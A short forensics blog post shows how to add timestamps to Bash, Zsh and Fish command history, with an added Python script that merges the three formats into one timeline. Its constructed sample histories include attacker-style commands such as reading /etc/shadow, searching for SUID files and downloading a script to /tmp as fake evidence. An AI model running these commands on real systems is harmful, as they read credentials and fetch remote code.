Two-minute InfoSec — Shell History Timestamps
Chapin Bryce
Posted on March 5, 2020
A new series aimed at sharing quick wins for organizational security, forensic investigations, incident response and more, each of which you can implement in two minutes or less.
Today’s post is focused on a feature of nearly every shell: command history. The history file is a rich source of evidence of prior user activity, especially on Linux/Unix/macOS systems. One major drawback is that, by default, most shells do not store timestamps in this file, which makes it hard to place the commands on a timeline and costs a lot of valuable investigative time.
In this post we will cover how to quickly implement timestamps in some common shells including:
- Bash
- Zsh
- Fish
Not all Linux/Unix/macOS platforms are made the same! These are general ways to accomplish this goal, but always test before putting things into production.
Bash
For user accounts, modify the ~/.bashrc or ~/.bash_profile file and add the line below (no spaces around the = sign, or bash reads ="..." as a second, invalid variable name and rejects it):
export HISTTIMEFORMAT="%F %T %z "
This same line can be placed in /etc/bashrc (or /etc/bash.bashrc on Debian-based systems) to load across user profiles. Once HISTTIMEFORMAT is set, bash also writes each command’s time into the history file as an epoch comment line (for example #1583366400) immediately before the command, so the timestamps survive across sessions and can be read without bash. Two caveats for investigations: bash only writes the history file when the shell exits unless PROMPT_COMMAND='history -a' is also set, so a session that is killed rather than logged out may leave nothing behind; and because these are ordinary shell variables, any user can unset them in their own session, so the system-wide setting raises the bar but does not make history tamper-proof.
Source: https://linux.die.net/man/1/bash
Zsh
For user accounts, add the line below to ~/.zshrc, or to /etc/zshrc for a system-wide implementation (the command is setopt, singular; setopts is not a zsh builtin):
setopt EXTENDED_HISTORY
This will not only record the timestamp of execution but also the duration of execution, a very handy data point in investigations! Each saved line then has the form : <start epoch>:<elapsed seconds>;<command>, and history -i (short for fc -l -i) prints the start times in readable form. Zsh does not save history at all unless HISTFILE and SAVEHIST are set, and like bash it writes the file on exit by default; setopt INC_APPEND_HISTORY makes it append each command as it runs. Some zsh configurations already enable this option, and csh-family shells keep history their own way, though it doesn’t hurt to check!
Source: http://zsh.sourceforge.net/Doc/Release/Options.html#Options
Fish
Enabled by default! Fish stores a when: epoch timestamp alongside every cmd: record, and history --show-time prints them. Check that your history file is located at:
~/.local/share/fish/fish_history
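As an added example that is not part of the original post, the script below reads the three on-disk formats described above (bash’s #<epoch> comment lines, zsh’s : <start>:<elapsed>;<command> lines and fish’s cmd:/when: records) and merges them into one timeline, which is what you actually want during an investigation. The sample history contents are constructed for the example, and the function and class names are my own.

```python
"""Normalise Bash, Zsh and Fish history files into a single timeline.

Added example, not code from the original post. It assumes the on-disk
formats each shell uses once timestamps are enabled:
  bash (HISTTIMEFORMAT set): a '#<epoch>' comment line precedes each command
  zsh  (EXTENDED_HISTORY):   ': <epoch>:<elapsed seconds>;<command>'
  fish:                      '- cmd: <command>' followed by '  when: <epoch>'
The sample histories at the bottom are constructed, not real evidence.
"""
import re
from datetime import datetime, timezone
from typing import List, NamedTuple, Optional


class HistEntry(NamedTuple):
    shell: str
    when: Optional[int]     # epoch seconds; None if the entry has no timestamp
    elapsed: Optional[int]  # zsh only: seconds the command ran
    cmd: str


def parse_bash(text: str) -> List[HistEntry]:
    """Pair each '#<epoch>' comment line with the command that follows it."""
    entries, pending = [], None
    for line in text.splitlines():
        m = re.fullmatch(r"#(\d+)", line)
        if m:
            pending = int(m.group(1))
            continue
        if line.strip():
            # Commands recorded before HISTTIMEFORMAT was set have no '#' line.
            entries.append(HistEntry("bash", pending, None, line))
            pending = None
    return entries


ZSH_LINE = re.compile(r"^: (\d+):(\d+);(.*)$")


def parse_zsh(text: str) -> List[HistEntry]:
    """Split ': <start>:<elapsed>;<cmd>' lines; plain lines are kept undated."""
    entries = []
    for line in text.splitlines():
        m = ZSH_LINE.match(line)
        if m:
            entries.append(HistEntry("zsh", int(m.group(1)), int(m.group(2)), m.group(3)))
        elif line.strip():
            entries.append(HistEntry("zsh", None, None, line))
    return entries


def parse_fish(text: str) -> List[HistEntry]:
    """Read fish's YAML-like records; 'paths:' sub-lists are ignored."""
    entries, cmd, when = [], None, None
    for line in text.splitlines():
        if line.startswith("- cmd: "):
            if cmd is not None:
                entries.append(HistEntry("fish", when, None, cmd))
            cmd, when = line[len("- cmd: "):], None
        elif line.startswith("  when: "):
            when = int(line[len("  when: "):])
    if cmd is not None:
        entries.append(HistEntry("fish", when, None, cmd))
    return entries


def timeline(*groups: List[HistEntry]) -> List[HistEntry]:
    """Merge parsed histories oldest first; undated entries sort last."""
    merged = [e for g in groups for e in g]
    return sorted(merged, key=lambda e: (e.when is None, e.when or 0))


def render(e: HistEntry) -> str:
    """One timeline line in the same date/time/offset style the post configures."""
    if e.when is None:
        stamp = "(no timestamp)".ljust(25)
    else:
        stamp = datetime.fromtimestamp(e.when, timezone.utc).strftime("%Y-%m-%d %H:%M:%S %z")
    dur = f" [{e.elapsed}s]" if e.elapsed is not None else ""
    return f"{stamp} {e.shell:<4} {e.cmd}{dur}"


# Constructed sample histories for the example.
BASH_SAMPLE = "uname -a\n#1583366400\nls -la /root\n#1583366460\ncat /etc/shadow\n"
ZSH_SAMPLE = ": 1583366430:5;find / -perm -4000 -type f 2>/dev/null\n: 1583366500:0;whoami\n"
FISH_SAMPLE = (
    "- cmd: curl -o /tmp/x.sh http://example.com/x.sh\n  when: 1583366445\n"
    "  paths:\n    - /tmp/x.sh\n- cmd: id\n  when: 1583366520\n"
)

if __name__ == "__main__":
    for entry in timeline(parse_bash(BASH_SAMPLE), parse_zsh(ZSH_SAMPLE), parse_fish(FISH_SAMPLE)):
        print(render(entry))
```

Point the parsers at real files (for example open(".bash_history").read()) to build the same timeline for a live host; entries with no timestamp are kept rather than dropped, since the fact that a command predates the timestamp setting is itself useful.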
Have another shell you use and prefer? Or maybe an alternative implementation on a specific OS? Comment and we can add it in to this post for ease of future reference!